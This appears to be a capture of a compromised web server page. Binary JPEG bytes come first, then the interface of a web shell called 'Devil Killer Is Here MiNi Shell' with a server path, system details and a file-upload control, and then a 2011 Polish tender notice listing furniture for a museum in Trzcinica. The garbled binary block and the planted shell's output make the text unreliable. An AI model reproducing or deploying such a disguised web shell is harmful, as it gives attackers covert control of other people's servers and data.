JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110207/43805-N-2011.html

<p class="kh_header"><b>Krosno: Dostawa  mebli biurowych  wyposażenia do Skansenu Archeologicznego Karpacka Troja w Trzcinicy</b><br>
<b>Numer ogłoszenia: 43805 - 2011; data zamieszczenia: 07.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podkarpackie w Krośnie , ul. Piłsudskiego 16, 38-400 Krosno, woj. podkarpackie, tel. 013 4321376, faks 013 4324301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.krosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa insytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  mebli biurowych  wyposażenia do Skansenu Archeologicznego Karpacka Troja w Trzcinicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli biurowych, krzeseł i innych elementów wyposażenia ruchomego niezbędnych dla poprawnego funkcjonowania pawilonu wystawowego w  Skansenie  Archeologicznym Karpacka Troja w Trzcinicy, 
38 - 207  Przysieki, Trzcinica  646.
Wykonawca przed przystąpieniem do realizacji zamówienia w zakresie dostawy i montażu zobowiązany jest do zapoznania się z opisem przedmiotu zamówienia oraz rozmieszczeniem poszczególnych elementów zgodnie z opracowanym projektem, jak również dokonania wizji lokalnej obiektu.
Przy przygotowaniu oferty oraz wykonaniu elementów wyposażenia należy uwzględnić wskazówki dotyczące materiałów oraz rozwiązań technicznych. 
Zgodnie z art. 29 ust.3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Zamawiający dopuszcza dostawę mebli biurowych, krzeseł, i innych elementów wyposażenia ruchomego równoważnych,  co do jakości opisywanych pod warunkiem, iż w kol. 7 załącznika nr 1 zostanie uwidoczniona nazwa producenta, model i parametry techniczne oferowanego elementu równoważnego.
W uzasadnionych przypadkach Wykonawca, który powołuje się na rozwiązania równoważne z opisywanymi przez Zamawiającego jest zobowiązany wykazać poprzez przedstawienie stosownych dowodów, iż oferowane przez niego rzeczy spełniają wymagania określone przez Zamawiającego.
Wykonawca jest zobowiązany do dostarczenia wraz z dostawą wszystkich atestów 
i certyfikatów dotyczących dostarczonych elementów zamówienia.
Na dostarczone meble i sprzęt ruchomy Wykonawca udzieli Zamawiającemu
36 miesięcznej gwarancji, a na montaż 60 miesięcy gwarancji licząc od daty podpisania protokołu odbioru końcowego.
Wykonawca będzie zobowiązany dostarczyć Zamawiającemu komplet dokumentów dotyczących gwarancji.
Zamawiający wymaga odbycia wizji lokalnej w wybudowanym pawilonie wystawowym na etapie przygotowywania oferty.
Zamówienie obejmuje dostawę do siedziby Zamawiającego (38-207 Przysieki, Trzcinica 646) na własny koszt oraz  montaż. 
Zamawiający nie dopuszcza składania ofert wariantowych.
Zamawiający nie dopuszcza składania ofert częściowych. 
Zestawienie i opis systemów:

L.p.	Nazwa	Wymiar	Ilość sztuk
PARTER		
1.14  Pokój przewodników - system OGI_U		
1.Biurko prostokątne BU02	120x80x72	1
2.Biurko BU04	160x80x72	1
3.Kontener stacjonarny, 4-szufladowy KK74, centralny zamek, szuflady płytowe na prowadnicach rolkowych w kolorze antracyt - obciążenie dynamiczne szuflady do 25 kg, blat o grubości 28 mm	43,4x80x72	1
4.Szafa ubraniowa, 2 drzwiowa, z wysuwanym wieszakiem K5204	80,2x43,2x183,3	1
5.Szafa aktowa, 5(5 zamknięta, 2 drzwiowa, K5204	80,2x43,2x183,3	2
6.Szafa aktowa wysoka 3(5 zamknięta, dołem 2 drzwi z zamkiem, na 5 rzędów segregatorów  K5304	80,2x43,2x183,3	1
1.15 Sekretariat - system Ergonomic Master		
1.Biurko prostokątne BR04	160x80x74	1
2.Dostawka recepcyjna na 2 nóżkach LA40, blat w kształcie elipsy	140x30x110	1
3.Biurko prostokątne BR01	80x80x74	1
4.Kontener mobilny, 3 szufladowy KW13, centralny zamek z blokadą wysuwu drugiej szuflady, łamany klucz, szuflady tworzywowe na prowadnicach kulkowych o nośności 35 kg, blat 38 mm	 	1
5.Kontener stacjonarny 4 szufladowy z nadstawką żaluzjową ZPW74,  centralny zamek z blokadą wysuwu drugiej szuflady, łamany klucz,  szuflady plastikowe z możliwością organizacji przestrzeni na prowadnicach kulkowych o nośności 35 kg, blat o grubości 28 mm, żaluzja w kolorze aluminium, piórnik nakładka w zestawie, 43,4x80x112,5	1
6.Szafa ubraniowa A66PG (AB66) z drążkiem, 1 drzwiowa	40,3x60,2x183,3	1
7.Szafa aktowa A5404 (AB54), 2(4 zamknięta, 2 drzwiowa, z zamkiem 80,2x43,2 x183,3	1
8.Szafa aktowa A2P06 (AB02), z drzwiami przesuwnymi, z zamkiem	120x43,4 x741
1.16 Gabinet Dyrektora - system Ergonomic Master		
1.Biurko prostokątne BR05	180x80x74	1
2.Biurko kwadratowe BR01	80x80x74	             1 
3.Osłona przednia do biurka rastrowa metalowa UR16, otwory poziome 160x1,5x30	1
4.Kontener mobilny 4 szufladowy KT13 (1 szuflada - piórnik), centralny zamek z blokadą wysuwu drugiej szuflady, łamany klucz, szuflady plastikowe z możliwością organizacji przestrzeni na prowadnicach kulkowych o nośności 35 kg, blat o grubości 28 mm, żaluzja w kolorze aluminium, 	43,4x60x58	1
5.Szafa aktowa A4404 (AB44), 2(4 zamknięta, 2 drzwiowa, z zamkiem 80,2x43,2 x148,1	3
6.Szafa ubraniowa A66PG (AB66) 1 drzwiowa z drążkiem  	40,3x60,2x183,3	1
7.Szafa aktowa A4104 (AB41), 4(4 zamknięta, 2 drzwiowa, z zamkiem 80,2x43,2 x148,1	1
1.17 Pokój gościnny		
1.Łóżko na stelażu z płyty meblowej (skrzynia) z pojemnikiem na pościel z wezgłowiem materac sprężynowy na ramie z zapewnionym dostępem do pojemnika na pościel 	90x200x45	1
2.Szafka nocna BS130 z szufladą	45x50x55	    1
3.Toaletka BS210 z szufladą i szafką 1 drzwiową	120x50x85	1
4.Panel z lustrem BS230	60x100	1
5.Szafa ubraniowa z drążkiem + półki BS410 z przystosowaniem zabudowy lodówki będącej na stanie Zamawiającego 	90x62x200	1
6.Osłona ściany przy łóżku z płyty meblowej	200x1,8x30	1
7.Krzesło konferencyjne Zen 212 Z, na ramie na 4 nogach z podłokietnikami. 
Oparcie i siedzisko w całości tapicerowane tkaniną z 1 grupy cenowej.
Podłokietniki z drewnianymi nakładkami.
Podstawa krzesła stalowa, chromowana.
Stopki do powierzchni drewnianych.
Wykończenie - zgodnie z wzornikiem BN Office Solution	 	1
1.19 Pokój gościnny		
1.Łóżko na stelażu z płyty meblowej (skrzynia) z pojemnikiem na pościel z wezgłowiem, materac sprężynowy na ramie z zapewnionym dostępem do pojemnika na pościel . Wysokość łóżka 45 cm wraz z materacem	90x200x45	1
2.Szafka nocna BS130 z szufladą	45x50x55	1
3.Toaletka BS210 z szufladą i szafką 1 drzwiową	120x50x85	1
4.Panel z lustrem BS230	60x100	1
5.Szafa ubraniowa z drążkiem + półki BS410 z przystosowaniem zabudowy lodówki będącej na stanie Zamawiającego 	90x62x200	1
6.Osłona ściany przy łóżku z płyty meblowej	200x1,8x30	1
7.Krzesło konferencyjne Zen 212 Z, na ramie na 4 nogach z podłokietnikami. 
Oparcie i siedzisko w całości tapicerowane tkaniną z 1 grupy cenowej.
Podłokietniki z drewnianymi nakładkami.
Podstawa krzesła stalowa, chromowana.
Stopki do powierzchni drewnianych.
Wykończenie - zgodnie z wzornikiem BN Office Solution	 	1
1.21 Pokój gościnny		
1.Łóżko na stelażu z płyty meblowej (skrzynia) z pojemnikiem na pościel z wezgłowiem, materac sprężynowy na ramie z zapewnionym dostępem do pojemnika na pościel. Wysokość łóżka  ok. 45 cm wraz z materacem.	90x200x45
2
3.Szafka nocna BS130 z szufladą	45x50x55	2
4.Panel z lustrem BS230	60x100	1
5.Szafa ubraniowa z drążkiem + półki BS410	90x62x200	1
6.Stolik okolicznościowy BS610, blat z płyty meblowej o grubości 28 mm, noga postumentowa o średnicy 50 mm, średnica podstawy 45 cm, talerz chromowany, filar malowany proszkowo	 	1
7.Osłona ściany przy łóżku z płyty meblowej	200x1,8x30	2
8.Krzesło konferencyjne Zen 212 Z, na ramie na 4 nogach z podłokietnikami. 
Oparcie i siedzisko w całości tapicerowane tkaniną z 1 grupy cenowej.
Podłokietniki z drewnianymi nakładkami.
Podstawa krzesła stalowa, chromowana.
Stopki do powierzchni drewnianych..
Wykończenie - zgodnie z wzornikiem BN Office Solution	 	2
1.23 Pokój gościnny
1.Łóżko na stelażu z płyty meblowej (skrzynia) z pojemnikiem na pościel z wezgłowiem, materac sprężynowy na ramie z zapewnionym dostępem do pojemnika na pościel. Wysokość łóżka  ok. 45 cm wraz z materacem.	90x200x45  2
2.Szafka nocna BS130 z szufladą	45x50x55	  2
3.Panel z lustrem BS230	60x100	1
4.Szafa ubraniowa z drążkiem + półki BS410	90x62x200	1
5.Stolik okolicznościowy BS610, blat z płyty meblowej o grubości 28 mm, noga postumentowa o średnicy 50 mm, średnica podstawy 45 cm, talerz chromowany, filar malowany proszkowo	 	1
6.Osłona ściany przy łóżku z płyty meblowej	200x1,8x30	2
7.Krzesło konferencyjne Zen 212 Z, na ramie na 4 nogach z podłokietnikami. 
Oparcie i siedzisko w całości tapicerowane tkaniną z 1 grupy cenowej.
Podłokietniki z drewnianymi nakładkami.
Podstawa krzesła stalowa, chromowana.
Stopki do powierzchni drewnianych.
Wykończenie - zgodnie z wzornikiem BN Office Solution	 	2
1.25 Pokój gościnny		
1.Łóżko na stelażu z płyty meblowej (skrzynia) z pojemnikiem na pościel z wezgłowiem, materac sprężynowy na ramie z zapewnionym dostępem do pojemnika na pościel . Wysokość łóżka 45 cm wraz z materacem	90x200x45	1
2.Szafka nocna BS130 z szufladą	45x50x55	1
3.Toaletka BS210 z szufladą i szafką 1 drzwiową	120x50x85	1
4.Panel z lustrem BS230	60x100	1
5.Szafa ubraniowa z drążkiem + półki BS410 z przystosowaniem zabudowy lodówki będącej na stanie Zamawiającego 	90x62x200	1
6.Osłona ściany przy łóżku z płyty meblowej	200x1,8x30	1
7.Krzesło konferencyjne Zen 212 Z, na ramie na 4 nogach z podłokietnikami. 
Oparcie i siedzisko w całości tapicerowane tkaniną z 1 grupy cenowej.
Podłokietniki z drewnianymi nakładkami.
Podstawa krzesła stalowa, chromowana.
Stopki do powierzchni drewnianych.
Wykończenie - zgodnie z wzornikiem BN Office Solution	 	1
1.27 Pokój gościnny		
1.Łóżko na stelażu z płyty meblowej (skrzynia) z pojemnikiem na pościel z wezgłowiem, materac sprężynowy na ramie z zapewnionym dostępem do pojemnika na pościel . Wysokość łóżka 45 cm wraz z materacem	90x200x45	1
2.Szafka nocna BS130 z szufladą	45x50x55	1
3.Toaletka BS210 z szufladą i szafką 1 drzwiową	120x50x85	1
4.Panel z lustrem BS230	60x100	1
5.Szafa ubraniowa z drążkiem + półki BS410 z przystosowaniem zabudowy lodówki będącej na stanie Zamawiającego 	90x62x200	1
6.Osłona ściany przy łóżku z płyty meblowej	200x1,8x30	1
7.Krzesło konferencyjne Zen 212 Z, na ramie na 4 nogach z podłokietnikami. 
Oparcie i siedzisko w całości tapicerowane tkaniną z 1 grupy cenowej.
Podłokietniki z drewnianymi nakładkami.
Podstawa krzesła stalowa, chromowana.
Stopki do powierzchni drewnianych.
Wykończenie - zgodnie z wzornikiem BN Office Solution	 	1
1.34 Stolarnia - system OGI_U		
1.Biurko BU04	160x80x72	1
2.Kontener mobilny, 3 szufladowy KK13, centralny zamek, szuflady płytowe na prowadnicach rolkowych w kolorze antracyt - obciążenie dynamiczne szuflady do 25 kg, blat o grubości 18 mm	 	1
1.37 Pracownia konserwatorska - system OGI_U		
1.Biurko BU04	160x80x72	1
2.Kontener mobilny, 3 szufladowy KK13, centralny zamek, szuflady płytowe na prowadnicach rolkowych w kolorze antracyt - obciążenie dynamiczne szuflady do 25 kg, blat o grubości 18 mm	 	1
1.38 Pokój socjalny		
1.Zestaw szafek kuchennych stojących i wiszących, zlewozmywak 1 komorowy z ociekaczem ze stali nierdzewnej + bateria mieszakowa chromowa, srebrne listwy przyblatowe, blat postformingowy o grubości 38 mm	ok. 2,4 mb	1
2.Stół Simple (C/B/MA/18), o wymiarach: szerokość 80, głębokość 80, wysokość 72 cm
Podstawa stalowa chromowana.
Wykończenie - melamina z wzornika BN Office Solution 	80x80x75	1
3.Krzesło stacjonarne Bingo Wood Chrom, na 4 nogach.
Siedzisko i oparcie - sklejka bukowa, bejcowana.
Rama krzesła stalowa, chromowana. Stopki do miękkich powierzchni.
Wykończenie - zgodnie z wzornikiem BN Office Solution	 	2
1.39 Pracownia konserwatorska - system OGI_U		
1.Biurko BU04	160x80x72	1
2.Kontener mobilny, 3 szufladowy KK13, centralny zamek, szuflady płytowe na prowadnicach rolkowych w kolorze antracyt - obciążenie dynamiczne szuflady do 25 kg, blat o grubości 18 mm	 	1
1.40 Pracownia konserwatorska - system OGI_N		
1.Biurko prostokątne BN02	120x80x72	2
2.Kontener stacjonarny,  4-szufladowy KK74, centralny zamek, szuflady płytowe na prowadnicach rolkowych w kolorze antracyt - obciążenie dynamiczne szuflady do25 kg, blat o grubości 28 mm	43,4x80x72	2
3.Dostawka boczna na dwóch nogach stalowych PN40, średnica nogi 40 mm - kolor aluminium, blat grubości 28 mm	172x50x72	2
4.Szafa ubraniowa, 2 drzwiowa, z wysuwanym wieszakiem K5204 80,2x43,2x183,3 1
5.Szafa aktowa wysoka 3/5 zamknięta, dołem 2 drzwi z zamkiem, na 5 rzędów segregatorów  K5304	80,2x43,2x183,3	3
1.42 Pokój biurowy - system OGI_N		
1.Biurko prostokątne BN04	160x80x72	2
2.Kontener stacjonarny, 4-szufladowy KK74, centralny zamek, szuflady płytowe na prowadnicach rolkowych w kolorze antracyt - obciążenie dynamiczne szuflady do25 kg, blat o grubości 28 mm	43,4x80x72	2
3.Szafa ubraniowa, 2 drzwiowa, z wysuwanym wieszakiem K5204	80,2x43,2x183,3	1
4.Szafa aktowa wysoka 3/5 zamknięta, dołem 2 drzwi z zamkiem, na 5 rzędów segregatorów  K5304	80,2x43,2x183,3	3
1.43 Pokój biurowy - system OGI_N		
1.Biurko prostokątne BN04	160x80x72	2
2.Kontener stacjonarny, 4-szufladowy KK74, centralny zamek, szuflady płytowe na prowadnicach rolkowych w kolorze antracyt - obciążenie dynamiczne szuflady do25 kg, blat o grubości 28 mm	43,4x80x72	2
3.Szafa ubraniowa, 2 drzwiowa, z wysuwanym wieszakiem K5204	80,2x43,2x183,3	1
4.Szafa aktowa wysoka 3/5 zamknięta, dołem 2 drzwi z zamkiem, na 5 rzędów segregatorów  K5304	80,2x43,2x183,3	3
1.12 Sala konferencyjna		
1.Biurko Ergonomic Master BR03	140x80x74	4
2.Osłona przednia do biurka płytowa UH3	120x1,8x40	4
3.Krzesło stacjonarne Leonardo II Arm Lb (Leonardo 412 Z), na 4 nogach z podłokietnikami.
Oparcie i siedzisko w całości tapicerowane tkaniną z 2/3 grupy cenowej.
Podłokietniki z nakładkami PU.
Rama krzesła stalowa, chromowana. Stopki do powierzchni drewnianych.
Możliwość łączenia krzeseł w rzędy za pomocą linków.
Wykończenie - zgodnie z wzornikiem BN Office Solution	 	124
1.6 Sklepik		
1.Lada sprzedaży typu SERIO, niska H=85 cm; głębokość 60 cm, blat roboczy i nogi pionowe z laminatu, reszta z płyty meblowej w identycznym kolorze; poziome pasy ozdobne z laminatu imitującego stal nierdzewną, pionowe nogi o grubości 8 cm;  blat roboczy o grubości 28 mm; pod blatem zabudowa w formie regałów 210x60x85	1
2.Szafka niska zamykana w ? szerokości , 1 drzwiowa, z zamkiem, w części otwartej zainstalowanie półki  z wykonaniem przepustów (przelotek) na instalacje komputerowe 	80x43x85	1
3.Witryna ekspozycyjna. Dołem wykonana z płyty meblowej i zamykana 2 drzwiczkami do wysokości 85 cm, w tym 1 półka. Górna część przeszklona, 2 drzwi , wysokość 100 cm z 4 półkami (korpus szkło klejone hartowane 6 mm + zawiasy ze stali nierdzewnej). Obie części zamykane. Zamawiający przekaże kpl  górnej części przeszklonej  do ponownego zabudowania.	80x40x185	4
4.Szafa wysoka 1 drzwiowa, 4 półki, z zamkiem.	40x40x185	1
5.Szafa aktowa 2 drzwiowa, 4 półki, z zamkiem.	80x43x200	3
1.3 Pokój ochrony - system OGI_N		
1.Biurko BU04	160x80x72	1
2.Biurko BU03	140x80x72	2
3.Kontener stacjonarny,  4-szufladowy KK74, centralny zamek, szuflady płytowe na prowadnicach rolkowych w kolorze antracyt - obciążenie dynamiczne szuflady do25 kg, blat o grubości 28 mm	43,4x80x72	1
4.Szafa aktowa 1 drzwiowa K3602	40,3x43,2x112,9	10
1.4 Kasa biletowa 		
1.Lada recepcyjna typu SERIO, wysoka H=110 cm, głębokość 80 cm; blat górny, dolny i nogi pionowe z laminatu, reszta z płyty meblowej w identycznym kolorze; poziome pasy ozdobne z laminatu imitującego stal nierdzewną; pionowe nogi o grubości 8 cm,  blat nadstawki o grubości 18 mm a roboczy 28 mm, lewa część lady od strony pracownika pod blatem roboczym-zabudowana. W blacie lady należy wykonać przelotki(przepusty) na instalacje komputerowe.	wg projektu	1
2.Kontener mobilny, 3 szufladowy, centralny zamek, szuflady płytowe na prowadnicach rolkowych - obciążenie dynamiczne szuflady do 25 kg, blat o grubości 18 mm	42x50x58	1
3.Szafa ubraniowa, 2 drzwiowa, z wysuwanym wieszakiem K5204	80x40x183	1
4.Szafa aktowa żaluzjowa, z pionową przegrodą  K3Z06	120x45x113	2
5.Szafa aktowa 5/5 zamknięta 2 drzwiowa K5204 	120x45x113	1
1.2 Szatnia		
1.Lada recepcyjna typu SERIO, niska H=85 cm; głębokość 60 cm, blat roboczy i nogi pionowe z laminatu, reszta z płyty meblowej w identycznym kolorze; poziome pasy ozdobne z laminatu imitującego stal nierdzewną, pionowe nogi o grubości 8 cm;  blat roboczy o grubości 28 mm; pod blatem zabudowa w formie regałów	wg projektu	1
2.Wieszak jednostronny wiszący, stalowy mocowany do ściany. Konstrukcja malowana proszkowo. Pod wieszakiem osłona ściany z płyty meblowej. Wieszaczki aluminiowe (bez widocznych wkrętów mocujących) podwójne - 15 szt. Breloczki wiszące ze stali nierdzewnej + numerki nad wieszaczkiem aluminiowe.	180x170	1
3.Wieszak dwustronny stalowy, stojący, mocowany do ściany i podłoża. Konstrukcja malowana proszkowo. Wieszaczki aluminiowe (bez widocznych wkrętów mocujących) podwójne - 30 szt. na wieszak ( po 15 szt. z każdej strony), dołem półka z blatem z płyty meblowej. Breloczki wiszące ze stali nierdzewnej + numerki nad wieszaczkiem aluminiowe.	180x40x170	4
4.Szafa 2/5 otwarta, część dolna zamykana 2 drzwiami, z zamkiem	90x45x200	2

OPIS WYPOSAŻENIA MEBLOWEGO
System Ergonomic Master
Stelaż z pionowym i poziomym prowadzeniem okablowania na bazie nóg kolumnowych. Kolumna stalowa, malowana proszkowo, stopa wykonana z aluminium polerowanego. Kolumny stelaża połączone są ze sobą solidną stalową rynną kablową, będącą jednocześnie elementem konstrukcyjnym. Trzon nogi posiada łatwo zdejmowaną osłonę umożliwiającą swobodne prowadzenie okablowania (na magnesach). Osłona przednia biurka wykonana z blachy perforowanej. Blat biurka wykonany z płyty o grubości 28 mm, krawędzie oklejone obrzeżem PCV 2 mm.
Korpusy szaf  są wykonane z płyty o grubości 18 mm, włącznie z ścianą tylną, krawędzie zabezpieczone PCV 0,5 mm. Fronty (drzwi) wykonane z płyty 18 mm, krawędzie oklejone PCV 2 mm. Lewe skrzydło uzbrojone w elastyczną listwę przymykową.
Wieniec górny wykonany z płyty o grubości 28 mm, krawędzie frontowe oklejone 2 mm PCV. Półki mocowane za pomocą złącz zabezpieczających przed przypadkowym wysunięciem. W szafach montowane są stopki z możliwością regulacji od wewnątrz szafy.
Szafy posiadają zamki patentowe z kluczem w 100 000 kombinacji. Korpusy szaf w kolorze aluminium, fronty i blaty w kolorze drewna.
Kontenery posiadają kółka o średnicy 50 mm w tym dwa z hamulcem. Korpusy wykonane z płyty 18 mm. Blat górny przy kontenerach stacjonarnych wykonany z płyty 28 mm a przy mobilnych o grubości 18 mm. Blat górny i fronty szuflad zabezpieczone 2 mm PCV. Szuflady tworzywowe z możliwością organizacji przestrzeni. Prowadnice kulkowe o nośności 35 kg. Centralny zamek z blokadą wysuwu drugiej szuflady, łamany klucz. Korpusy kontenerów w kolorze aluminium, fronty i blaty w kolorze drewna.

System OGI_N
Stelaż biurka z pionowym prowadzeniem okablowania na bazie nóg kolumnowych, malowanych proszkowo na kolor aluminium. Blat biurka wykonany z płyty meblowej o grubości 28 mm, krawędzie zabezpieczone 2 mm PCV. Nogi biurka łączone blendą z płyty meblowej o grubości 18 mm.
Korpusy szaf  są wykonane z płyty o grubości 18 mm. Ścian tylna wykonana z płyty HDF o grubości 3 mm (łączona dla szaf o szerokości 80 cm). Fronty (drzwi) wykonane z płyty 18 mm, krawędzie oklejone PCV 2 mm. Lewe skrzydło uzbrojone w elastyczną listwę przymykową.
Wieniec górny wykonany z płyty o grubości 28 mm, krawędzie frontowe oklejone 2 mm PCV. W szafach montowane są stopki z możliwością regulacji od wewnątrz szafy. Szafy posiadają zamki patentowe z kluczem w 100 000 kombinacji. 
Kontenery posiadają kółka o średnicy 50 mm w tym dwa z hamulcem. Korpusy wykonane z płyty 18 mm. Blat górny przy kontenerach stacjonarnych wykonany z płyty 28 mm a przy mobilnych o grubości 18 mm. Blat górny i fronty szuflad zabezpieczone 2 mm PCV. Szuflady płytowe w kolorze antracyt. Prowadnice rolkowe o nośności 25 kg, centralny zamek. Korpusy kontenerów w kolorze aluminium, fronty i blaty w kolorze drewna
System lad  typu SERIO
Blat górny nadstawki o grubości 18 mm a blat roboczy o grubości 28 mm, oba wykonane z laminatu HPL. Krawędzie blatów oklejone 2 mm PCV. Elementy pionowe o grubości 52 mm. Pozostałe elementy konstrukcyjne wykonane z płyty meblowej o grubości 18 mm. Ozdobne pasy poziome na froncie wykonane z laminatu imitującego stal nierdzewną.  Front lady od strony klienta cofnięty względem blatu i boków.
System mebli hotelowych
Korpusy szaf, szafek nocnych, toaletek, bagażników wykonane z płyty meblowej 
o grubości 18 mm. Wszystkie blaty o grubości 28 mm, zabezpieczone 2 mm PCV. Elementy frontowe zabezpieczone 2 mm PCV. Lustro fazowane klejone na płytę grubości 18mm wykończoną 2mm PCV.

Wymagania dodatkowe:
Wszystkie krzesła i fotele muszą posiadać opinie zgodności z wymaganiami norm w zakresie wymagań wytrzymałościowych oraz bezpiecznych rozwiązań konstrukcyjnych. Krzesło biurowe do pracy zgodność z rozporządzeniem MPiPS z 1 grudnia 1998 r. (Dz.U. nr 148 poz.973 z późń. zm.).

Wykonawca którego oferta zostanie wybrana jako najkorzystniejsza na etapie realizacji umowy, przed realizacją dostawy zobligowany będzie do dostarczenia zamawiającemu próbek celem wyboru kolorystyki i uzyskania pisemnej akceptacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

